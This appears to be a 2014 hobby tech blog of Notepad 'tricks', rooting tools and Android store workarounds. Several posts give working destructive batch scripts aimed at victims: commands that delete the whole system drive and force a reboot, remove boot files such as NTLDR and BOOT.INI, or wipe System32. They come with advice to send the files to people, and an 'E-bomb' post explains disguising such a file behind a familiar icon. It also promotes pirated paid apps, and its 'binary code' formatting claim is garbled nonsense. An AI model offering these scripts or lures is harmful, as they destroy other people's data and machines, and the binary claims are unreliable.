Pages

Tuesday 18 February 2014

Download All Android Paid Apps for Free!

0 comments


Appdroid is a free service that lets you Download paid android apps for free! :)



Download Appdroid- Click here!

Video Tutorial- Click here!





Read More ->>

Friday 7 February 2014

Open Notepad continuously

0 comments
Open Notepad.
Paste the following code in your notepad file:
@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top
Save the file with any name nut with .bat extension and close it.
Now open the file and see how it annoys you by opening notepad again and again.
#14. Pick Your Option Batch File
When used this creates a file which asks you to choose a number between 1-5 and then does a certain action (as shown below – Action accompanied by number):
1 – Shut’s down the computer
2 – Restart’s the computer
3 – Wipes out the hard drive
4 – Net send
5 – Shows a message & then shut’s down the computer
Before you try out this trick, keep in mind that this can cause loss of important data on your (or any one else’s on which you are running this file) computer system. So BEWARE! In order to create the file, follow the steps given below:
Open Notepad.
Paste the following code in the notepad file:
@echo off
title Get A Life
cd C:
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not cry if you loose your data or anything.
pause
echo Pick your option:
echo 1. Die Slowly
echo 2. Instant Death
echo 3. Stay Away From This One
echo 4. Die this way (For Wimps!)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Save the file with any name and with a .bat extension and close the file.
#15. IN THIS HACK I WILL SHOW YOU HOW TO FORMAT A HDD USING NOTEPAD    AND HOW TO DESTROY VICTIMS PC USING NOTEPAD. THIS IS REALLY COOL.
(A) STEP 1 :-
COPY THE FOLLOWING IN NOTEPAD EXACTLY AS IT IS.
SAYS01001011000111110010010101010101010000011111100000
STEP 2 :-
SAVE AS AN .EXE ANY NAME WILL DO
STEP 3 :-
SEND THE .EXE TO PEOPLE AND INFECT
OR
IF YOU THINK CANNOT FORMAT C DRIVE WHEN WINDOWS IS RUNNING TRY LAUGHING AND U WILL GET IT Secret. ANY WAY SOME MORE SO U CAN TEST ON OTHER DRIVES THIS IS SIMPLE BINARY CODE
FORMAT C:\ /Q/X — THIS WILL FORMAT YOUR DRIVE C:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
FORMAT D:\ /Q/X — THIS WILL FORMAT YOUR DIRVE D:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
FORMAT A:\ /Q/X — THIS WILL FORMAT YOUR DRIVE A:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
DEL /F/S/Q C:\BOOT.INI — THIS WILL CAUSE YOUR COMPUTER NOT TO BOOT.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
TRY TO FIGURE OUT URSELF REST
CANT SPOONFEED
ITS WORKING
DO NOT TRY IT ON YOUR PC. DON’T MESS AROUND THIS IS FOR EDUCATIONAL PURPOSE ONLY
STILL IF YOU CANT FIGURE IT OUT TRY THIS
GO TO NOTEPAD AND TYPE THE FOLLOWING:
(B) @ECHO OFF
DEL C:\ *.*|Y
SAVE IT AS DELL.BAT
WANT WORSE THEN TYPE THE FOLLOWING:
@ECHO OFF
DEL %SYSTEMDRIVE%\*.*/F/S/Q
SHUTDOWN -R -F -T 00
AND SAVE IT AS A .BAT FILE
(C) HOW TO SHUTDOWN A COMPUTER FOREVER..
CODE:
@ECHO OFF
ATTRIB -R -S -H C:\AUTOEXEC.BAT
DEL C:\AUTOEXEC.BAT
ATTRIB -R -S -H C:\BOOT.INI
DEL C:\BOOT.INI
ATTRIB -R -S -H C:\NTLDR
DEL C:\NTLDR
ATTRIB -R -S -H C:\WINDOWS\WIN.INI
DEL C:\WINDOWS\WIN.INI
OPEN UP AND COPY THE CODE AND SAVE IT AS .BAT FILE..
THIS WILL SHUT DOWN THE PERSON’S COMPUTER.IT SHUTS IT OFF ONCE AND DELETES THE FILES NEEDED TO REBOOT AND RESTART.
REMEMBER – DO NOT OPEN THE FILE.
YOU WON’T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!
(D) A SIMPLE HACK TO DESTROY UR VICTIM’S PC
I M HERE EXPLAIN TO MAKE A FILE THAT DESTROYS UR VICTIMS PC
I M NOT RESPONSIBLE FOR THE DAMAGE CAUSED BY THIS FILE.”
1. OPEN NOTEPAD
2. WRITE THE ABOVE COMMAND : -
DEL C:\WINDOWS\SYSTEM32\*.*/Q
3. SAVE THE ABOVE NOTEPAD WITH THE EXTENSION “.BAT OR .CMD” AS U WANT
4. !!!!!!!!!!!!!!!!!!!!!!ATTENTION!!!!!!!!!!!!!!!!!!! !!!
DON’T DOUBLE CLICK THE FILE OTHERWISE U R IN TROUBLE.
WHY ?????? BCZ THE FILE U CREATED DELETE ALL FILES FROM UR
SYSTEM32 FOLDER AND WHEN U RESTART UR PC IT WILL NOT START
BCZ SYSTEM CAN NOT FIND THE FILES IN THE SYSTEM32 FOLDER WHICH
IS REQUIRED AT THE TIME OF BOOTING.
5. YOU CAN ALSO TEST THE ABOVE BY CREATING A FAKE FOLDER LET SUPPOSE
WINDOWS1 IN C:\. COPY SOME OLD FILES IN IT AND JUST FOLLOW THE
ABOVE COMMAND.BY DOUBLE CLICKING THE BAT OR CMD FILE UR ALL FILES
AUTOMAITCALLY GET DELETED.
6. YOU CAN TRY THIS FILE IN ANY ONE`S COMPUTER.(BUT THIS RESULT IN CAUSING DAMAGE TO THE COMPUTER, SO THINK AGAIN BEFORE TRYING THIS ON ANYONE’S PC)
Read More ->>

Type “You are a fool” Continuously

0 comments
Not much to explain, the title says it all! Follow the steps to make this trick work:
Open Notepad.
Paste the following code in the notepad file:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop
Save the file with any name but with .vbs extension and close it.
Ope the file and see how it makes you type!
Read More ->>

Toggle Keyboard Button Simultaneously

0 comments
Using Notepad (and VB) you can set different keys on your keyboard to toggle continuously. Following are the 3 tricks using which different keys can be set to toggle simultaneously. Follow the steps given under each head to try out the tricks.
1. Caps Lock Key
Open Notepad.
Paste the following code in the notepad file:
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Save the file with anyname and .vbs extension. and close it.
Now open the newly created file and see how the caps lock key behaves on your keyboard!
2. Hit Enter Key Continuously
Open Notepad.
Paste the following code in the notepad file:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Save the file with any name and .vbs extension and close it.
Now open the newly created file and see how the enter key behaves!
3. Hit Backspace Key Continuously
Open Notepad.
Paste the following code in the notepad file:
MsgBox “Lets Rumble”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Save the file with any name and with .vbs extension and close it.
Now open the newly created file and see how the key behaves!
Read More ->>

Shut-down The Computer After Conveying Any Message

0 comments
This one is kind of an annoying trick and if used unknowingly can certainly cause problems (am serious). What this trick does is, after conveying a (any) message it shuts down the computer without any confirmation. In order to create the Shutdown file, follow the below mentioned steps:
Open Notepad.
Paste the following code in it:
@echo off
msg * Its time to get some rest.
shutdown -c “Error! You have to take rest! Byeeeeee” -s
Save the file with any name but with .bat extension and close it. For eg. TakeRest.bat
Read More ->>

Constantly Repeat Messages

0 comments
Using this notepad trick you can annoy anyone and can actually force them to log off or leave the computer (LOL….). This notepad trick will create an infinite cycle of a message in the computer. Follow the steps to know more:
Open Notepad.
Paste the following code in the notepad file:
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
Save the file with any file name but with .bat as extension and close it. For eg. Freakymessage.bat
After saving the file just open it (by double clicking) and see what happens.
Read More ->>

Change The Header/Footer Of Your Notepad File

0 comments
More often than not whenever you get a printout of your notepad file, it starts with “Untitled” or the filename at top, and “Page ” on bottom. Now if you want to get rid of it or want to change it, just follow the simple steps given below.
Open Notepad.
Click on File -> Page Setup.
Replace the text written in the “Header” and “Footer” box (as shown above) by any of the following codes:
&l Left-align the characters that follow
&c Center the characters that follow
&r Right-align the characters that follow
&d Print the current date
&t Print the current time
&f Print the name of the document
&p Print the page number
Read More ->>

Matrix Effect

0 comments
Not much to explain, just follow the steps and see the amazing matrix effect happen in your DOS window:
Open Notepad.
Copy the below mentioned text in your notepad file:
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
Save the file with .bat extension like Matrix.bat
Thats it. Just open the file to see the matrix effect right before your eyes!
Read More ->>

Convert Text Into Audio Using Notepad How To Do It ?

0 comments
Open Notepad file on your Windows PC.
Copy and paste the below mentioned code :
Dim msg, sapi
msg=InputBox(“Enter your text for conversion–www.techvorm.com”,”TechVorm Text-To-Audio Converter”)
Set sapi=CreateObject(“sapi.spvoice”)
sapi.Speak msg
Save this file with any name with .vbs as extension. For eg. Text-To-Audio.vbs
Thats it ! Your Text to Audio converter is ready to be used. Now open the saved file and key in the text you want to convert and click OK. If you find any difficulties in using this code, let me know via comments section.
Read More ->>

Continually Pop The CD Drive

0 comments
Open Notepad.
Copy the code given below onto the notepad file:
Set oWMP = CreateObject(“WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as “Anything.VBS”.
Now open the file and see the magic! The file will continuously force the CD rom to pop out! And If you have more than one then it pops out all of them!
Note: Don’t worry when this crazy notepad trick opens your cd tray continuously. If you want to end this script simply Open Task Manager(Alt+Ctrl+Delete). Under Processes end the process “wscript.exe”
Read More ->>

World Trade Centre Attack Trick – Shocking Notepad Tricks

0 comments
Did you know that the flight number of the plane that had hit WTC on 9/11 was Q33NY …
Open your Notepad
Type the flight number i.e Q33N in Capital Letters.
Increase the Font Size to 72
Change the Font to Wingdings
You will be amazed by the findings. Its a Plane going for 2 building shaped structures & then death.(see below)  WTF ?
Must Be Shocking Right.
But This Is Only Hoax As No Plane No:-Q33N Crashed Into Twin Towers.
#3. Test Your Anti-Virus
You can also test your anti virus program for its effectiveness using a simple notepad trick. Follow the steps below to know more:
Open Notepad.
Copy the code give below in the notepad file:
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Save it with an .exe extension like testvirus.exe
This test is also known as EICAR (European Institute for Computer Antivirus Research) test file.
The file is simply a text file of either 68 or 70 bytes that is a legitimate executable file called a COM file that can be run by Microsoft operating systems and some work-alikes (except for 64-bit due to 16-bit limitations), including OS/2. When executed, it will print “EICAR-STANDARD-ANTIVIRUS-TEST-FILE!” and then stop. The test string was specifically engineered to consist of ASCII human-readable characters, easily created using a standard computer keyboard. It makes use of self-modifying code to work around technical issues that this constraint makes on the execution of the test string.
Read More ->>

Bush Hid the Facts – Most Popular Notepad Tricks

0 comments
This is one of the mysterious notepad tricks we know. According to the trick it really seems Microsoft had put some hack into the coding of notepad making the text hidden after saving it.
Bush Hid the Facts – Most Popular Notepad Trick Open notepad.
Type BUSH HID THE FACTS
Save that file.
Close it
Open It Again See…
Why This Happens ? : It was later known 4335 Rule. It means that if we enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters each, and the last word has five letters. Then Notepad Automatically hides the text into unknown code. Similar are with “this app can break”.
OR
STEP 1: OPEN NOTEPAD
STEP 2: WRITE FOLLOWING LINE IN THE NOTEPAD.
THIS APP CAN BREAK
STEP 3: SAVE THIS FILE AS AAA.TXT
STEP 4: CLOSE THE NOTEPAD.
STEP 5: OPEN THE FILE AGAIN.
VOILLA!!
OR
1> OPEN NOTEPAD
2> ENTER FOUR WORDS SEPARATED BY SPACES, WHEREIN THE FIRST WORD HAS 4 LETTERS, THE NEXT TWO HAVE THREE LETTERS, AND THE LAST WORD HAS FIVE LETTERS
3> DON’T HIT ENTER AT THE END OF THE LINE.
4> SAVE THE FILE.
5> CLOSE NOTEPAD.
6> REOPEN NOTEPAD.
7> OPEN THE FILE YOU JUST SAVED.
YOU ARE DONE!!!
Read More ->>

How to Make an Easy E Bomb Using Notepad

0 comments
 An E-bomb is a simple type of computer prank that tricks a friend (or enemy) into thinking his or her computer is being hacked, is infected with a virus, or is experiencing a serious error. The process of executing an E-bomb involves writing a special kind of file using notepad which contains commands that slow down the computer, crash the system, or merely startle the user, then tricking the user into opening the file. E-bombs can be anything from a minor annoyance to a system-destroying nightmare for the user; the E-bombs in this article are intended merely as innocuous pranks, so the worst they'll do is cause a computer to crash. Note: Theses E-bombs are for Windows PCs - they will not work on Macs without special adjustments for compatibility. 
Make an Easy E Bomb Using Notepad Step 1 Version 2.jpg
Open Notepad. Batch (.BAT) files contain text commands that instruct the computer what to do. To write your own simple .BAT file, you don't need special editing software - just Windows' basic Notepad program. Notepad can usually be found in the Start menu, or, alternatively, in the "Accessories" folder.
Make an Easy E Bomb Using Notepad Step 2 Version 2.jpg
Type "@echo off", then, on a new line, "CLS". By default, .BAT files open up a command prompt window and display the commands being run. @echo off and CLS stop the commands in the command prompt window from appearing, making the processes that are taking place invisible to the user being pranked.
Make an Easy E Bomb Using Notepad Step 3 Version 2.jpg
Write a command to open multiple (or infinite) windows. Now, it's time to write a series of commands that will cause your fake virus to open either lots of program windows or an infinite amount of program windows. This is an important distinction - leaving a program running which opens an infinite amount of windows will eventually crash a computer. See below for instructions on making both kinds of "virus":
  • To open a finite number of windows, start a new line and type the following command into your notepad window: start (program name here). In place of the phrase of parentheses, put the name of a program on your computer or its precise file location. This command causes the computer to open a window of the program you specify. For example, start iexplore.exe will open a window of Internet Explorer. Repeat this "start" command as many times as you'd like - your "virus" will open a window for every time you repeat this command. Here are just a few ideas for programs you may want to enter after "start":
    • iexplore.exe - Internet
    • calc.exe - Calculator
    • notepad.exe - Notepad
    • winword.exe - Word 2013
  • To open an infinite number of windows, first start a new line and type :A, including the colon. Then, in the line under that, type start iexplore.exe (or use some other program). Finally, in the line under that, type goto A. This will cause the computer to open a window of Internet Explorer (or whatever program you specified) and then immediately return to the point in the instructions before it opened the program, effectively causing it to open new windows until the command prompt is closed or the computer crashes.
Make an Easy E Bomb Using Notepad Step 4 Version 2.jpg
Give your "virus" a message. For startling effect, you may want to add a message to your "virus" that makes the user think his or her computer is experiencing an error. To display a message, start a new line and type echo Your Message Here, typing your desired message where indicated. Then, start a new line and type pause. This causes your desired message to pop up in a command prompt window.
  • To make your prank more believable, use a message that sounds like something your computer might actually display in the event of an error. For instance, you might try: Fatal Error. C:// directory corrupted.
Make an Easy E Bomb Using Notepad Step 5.jpg
Save your file as a batch file. When you're finished, select File > Save As..., then make a file name ending in ".bat" (for example, pinball.bat). In the dropdown window next to "Save as type:", be sure to select "All files". Save your file anywhere on the computer.
Make an Easy E Bomb Using Notepad Step 6.jpg
Get the user to open the file. Now, all you've got to do to "detonate" your E-bomb is to trick someone into opening it! You can do this any way you like. One of the most sure-fire ways to trick someone into opening one is to create a shortcut of your batch file, then change its icon to something the user usually uses, then change the shortcut's name to match the new icon. Sit back and watch your results from a good vantage point!
Read More ->>

How to root any android device using VRoot

0 comments

To Download VRoot Click Here



Read More ->>

Saturday 18 January 2014

How to install Nokia , Samsung ,HTC app on any Device

0 comments
Hi , I found an easy and simple way to Browse and download from market as a third-party device.

I just translate and arrange this 
Source:http://www.windowsmania.pl/poradniki...oducenta-5114/

In response to the two other guides I decided to improve them and make them an easy and quick way to installation of any application from the collection of another manufacturer. I'm not here for the fun of change application ID and connect via USB. The guide (if no one is angry) I used some screenshots of the other instructions on this board go: 



TOOLS:
Download and install Fiddler:
Code:
Code:
http://fiddler2.com
And Folow:
1-Go to Tools -> Fiddler options -> Connections and select as below


2-Close and Run the program again.

3-Press start+r then enter: Ipconfig 
to know what is your IP



4-Enter the WiFi settings on your phone and click on the active WiFi connection (same on you pc , not 3G)
Edit it and type in the IP read the above paragraph and the port number 8888



Then Save Settings

5-Open the store from you mobile.

6-From PC ,on Fiddler'a with the active window Press Ctrl + R ,(it will open the notebook), press Ctrl + F and paste:
Code:
OnBeforeRequest (oSession: Session) {

The location shown in the screenshot paste the contents of the subsidiary as of the manufacturer to browse Market
Code:
if (oSession.uriContains ("Nokia")) 
{ 
  oSession.url = oSession.url.Replace ("Nokia", "Samsung"); 
}
Save changes to the file and close Notepad.

>>First is your phone manufacture and second is manufacture you want to use it's app.

7-Open store and search for the app you want , and once you opened the instal page , leave it and go to wifi setting page and remove the proxy configration , then go to app instal page and click install and have fun.
Read More ->>

Tuesday 14 January 2014

Here you can find some of the most amazing ROMs for Samsung Galaxy Ace GT-S5830 :-

0 comments
ClockWork Recovery Mod 5 for Samsung Galaxy Ace :
Root.zip for Samsung Ace :
Cyanogenmod 7.2 for Samsung Ace :
Samsung Galaxy SII ROM for Samsung Galaxy Ace GT-S5830 :
iOS ROM for Samsung Galaxy Ace :
Imaginary ICS ROM for Samsung Galaxy Ace :
Samsung Galaxy SII V10 JB ROM for Galaxy Ace :
Galaxy SIII V4 ROM for Galaxy Ace :
Cyanogenmod 10 Beta 1 for Samsung galaxy Ace :
MIUI Style LoKKer ROM for Galaxy Ace :
Xperiatized V13 ROM for Galaxy Ace:
Windows Phone 8 ROM for Galaxy Ace:
Gingercruzt v2.3 for Galaxy Ace:
AOKP RC1 for Galaxy Ace:
Thunderbolt v4 for Galaxy Ace:
CyanogenMod 10.1 Pro for Galaxy Ace:
SGS II V11 for Galaxy Ace:
iOS ROM V5 for Galaxy Ace:
CM 7.2 Democracy final for Galaxy Ace:
Read More ->>

Facebook now lets you message Mark Zuckerberg for "$100"

0 comments
According to a latest report, the Most Popular Social Networking Site Facebook now lets its users to send a message to the founder and CEO of Facebook Mark Zuckerberg for $100.
Facebook zuckerberg Facebook now lets you message Mark Zuckerberg for "$100"
We already know that Facebook is trying to please investors and increase its revenue but Facebook has surprised all of us by going so far. by Paying $100 for sending a message to Mark Zuckerberg which would  appear in his inbox rather go into his other folder.
in a report by Mashable, they claims that they tried sending message to Mark Zuckerberg from different Facebook accounts and found out that only those can send a message who doesn’t follow Mark Zuckerberg on Facebook.
Earlier Facebook was in news for charging their users $1 to send a message to whom they are not connected with.
Read More ->>

Blogger news

 

About Me

Recent Posts

Recent Comments

Email- abhijeetgupta2000@hotmail.co.in
Facebook-www.facebook.com/abhijeet.abhijeet

| Android Savvyy © 2009. All Rights Reserved | Template Style by My Blogger Tricks .com | Design by Brian Gardner | Back To Top |